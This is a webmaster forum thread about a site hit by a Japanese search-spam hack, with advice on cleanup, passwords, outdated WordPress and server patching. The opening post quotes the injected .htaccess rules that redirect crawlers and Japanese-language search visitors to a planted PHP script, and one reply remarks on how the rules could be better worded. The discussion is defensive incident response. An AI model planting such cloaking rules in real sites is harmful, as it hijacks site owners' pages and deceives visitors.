Welcome to WebmasterWorld Guest from 100.26.176.182

Forum Moderators: Ocean10000 & phranque

Message Too Old, No Replies

Is this a sign of Hacking

Host and GWT indicates the site is not hacked

     
5:04 pm on Sep 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


I have a site that is showing Japanese characters for all text when the the site comes up in a Google search. Yet I can go directly to the site using the domain name and the site looks fine and I can see no excess code on the home page. The hosting company can find no evidence of hacking and no warning in GWT/Search Console. I requested Google to fetch the page and index it and the japanese characters are still showing up. I also changed the password.

However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for Wordpress but the owner has never used Wordpress even though I can see it installed. It has one line for the japanese language so I suspect this is the problem.

Can someone tell me if I remove this section in htaccess (see below) and remove the blog off the server if this will take care of the hacking problem? Should I change the password again once I do this?

RewriteRule ^google(.*)\.html$ /wordpress/wp-admin/network/tpl/wp-og3.php?gg=$1 [L]
RewriteCond %{HTTP_USER_AGENT} (bot|google|yahoo|aol|bing|crawl|aspseek|icio|robot|spider|nutch|slurp|msnbot) [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|msn|search|bing|seznam|Seznam) [NC]
RewriteCond %{HTTP:Accept-Language} ^ja.*$ [NC]
RewriteCond %{REQUEST_FILENAME} !(wp-og3.php|xsl|css|jpg|gif|js)$ [NC]
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
7:24 pm on Sept 15, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4595
votes: 375


If the .htaccess file at the root directory is different from an older copy you (or the owner) have, I would be concerned about that server and consider finding a better host. Especially if this is a shared server, it might have been compromised to allow changes to the .htaccess file (and other files ). If the server itself has been compromised, any new password may be available to the party that made the change in the first place. Can you see the date/timestamp for the htaccess file?

If there is a blog and htaccess changes not made by the site owner or without their knowledge I would certainly want it uninstalled and remove the related lines from the .htaccess file as a start. Be sure there is not a related database left on the server. Much depends on what you find that shouldn't be there, the dates of changes as to whether it is a poorly configured hosting setup or a compromised server. Has the host been contacted, are they aware of the situation?
8:51 pm on Sept 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:15954
votes: 898


However the htaccess file has code that I don't recognize (the site hasn't been worked on for over a year). All the new code is for Wordpress but the owner has never used Wordpress even though I can see it installed. It has one line for the japanese language so I suspect this is the problem.

Please tell me your first response was to change the site passwords.

RewriteCond {various stuff}
RewriteRule ^(.*)$ /wordpress/wp-admin/network/tpl/wp-og3.php [L]
This is a nonsense rule anyway. What's the capture for, if it isn't going to be used in the redirect? Presumably the php file includes something that looks at FILENAME or REQUEST_URI-- whatever it's called in php-- so there's no need to include it in the URL.

:: irritably thinking that if the rule itself had been properly worded, there would be no need for all that css|js|etcetera stuff in the final condition, which should in any case have been the first condition, not that it's necessary to tell hackers how to improve their work ::
10:04 pm on Sept 15, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


Instead of waiting for a reply I called the host again and he said go ahead and remove the code from the htaccess file and delete WP. it kept replicating itself so I had to get the host to finish it. And then I changed the password again. Then requested Google re-index the site again and the google results are already recuperating an hour later.

This was apparently caused by the owner having someone install WP 3.1 a year ago without telling me and never finished it so it was never updated. (wasn't even listed in site manager as being installed which was odd). It looks like this was the avenue of access to the site. Plus the site is on an old server that needs to be updated. Not the hosts fault. The owner has just let the site sit idle. There is no database.

Thanks for your help everyone.
10:16 pm on Sept 15, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member topr8 is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Apr 19, 2002
posts:3522
votes: 89


>>Plus the site is on an old server that needs to be updated. Not the hosts fault.

is this a dedicated server run by the client? if not, how is this NOT the host's fault.
2:07 am on Sept 16, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator martinibuster is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Apr 13, 2002
posts:14939
votes: 497


how is this NOT the host's fault.


topr8 is right, you are not out of the woods. Your client is still in danger. While the htaccess file was directly related to the old WordPress installation, version 3.1, confirming that the entry point was WordPress and not the unpatched server (we're currently into WordPress version 4.6.1), the server itself may still present a critical problem.

As topr8 implies, your client's problem is not entirely solved. It is critical to get the server software patched up asap because your client's site is sitting on a time bomb.
3:01 am on Sept 16, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:4595
votes: 375


it kept replicating itself

Be sure to remove the sql file that WP creates on install or it can continue to reappear. If the site owner has no databases, there should be none in the account. If the site uses CP, check the software installation tools there and the phpMyAdmin.
8:33 am on Sept 16, 2016 (gmt 0)

Administrator from GB 

WebmasterWorld Administrator engine is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:May 9, 2000
posts:26498
votes: 1090


On top of what's been mentioned, there are a couple of resources out there that might also help you.

Google's Safe Browsing Site Status [google.com...]

Securi has an online scanner for one-off scans that's free to use, with a more comprehensive paid version.
[sitecheck.sucuri.net...]

And, as has been said, it's important to keep the plugins and software updated. The owner leaving it for a long while without that attention is asking for problems, IMHO.
5:36 pm on Sept 16, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


The site is not on a dedicated server. There is no database. I told the client he needs to upgrade to a new server. I removed all of WP. The site indexing is still is improving in google search. I'll keep watching it to make sure it doesn't reinfect the site.

Thanks for the info everyone.
5:37 pm on Sept 16, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:June 4, 2002
posts: 1923
votes: 3


PS. this site was never declared unsafe by Google.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members